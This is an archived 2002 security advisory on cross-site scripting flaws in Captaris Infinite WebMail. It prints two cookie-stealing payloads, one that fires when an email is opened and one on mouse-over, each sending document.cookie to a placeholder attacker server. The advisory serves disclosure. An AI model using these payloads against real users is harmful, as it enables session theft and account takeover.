17th Dec 2002 [SBWID-5883]
COMMAND
Captaris (Infinite) WebMail XSS
SYSTEMS AFFECTED
At least WebMail v3.61.05
PROBLEM
In pedram [http://pedram.redhive.com] advisory :
http://pedram.redhive.com/advisories/dogmail.cgi
Captaris (www.captaris.com) Infinite WebMail application is vulnerable
to Cross-Site Scripting (XSS) attacks. The application fails to filter
the following tags that can both be used to redirect a user to an
attack script:
Launch on e-mail open:
<p style="left:expression(document.location=
'http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie)">
Launch on mouse over:
<b onMouseOver= "document.location=
'http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie\">
I am sure there are other XSS attack methods that can also be utilized
to bypass their basic filtering.
SOLUTION
?
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH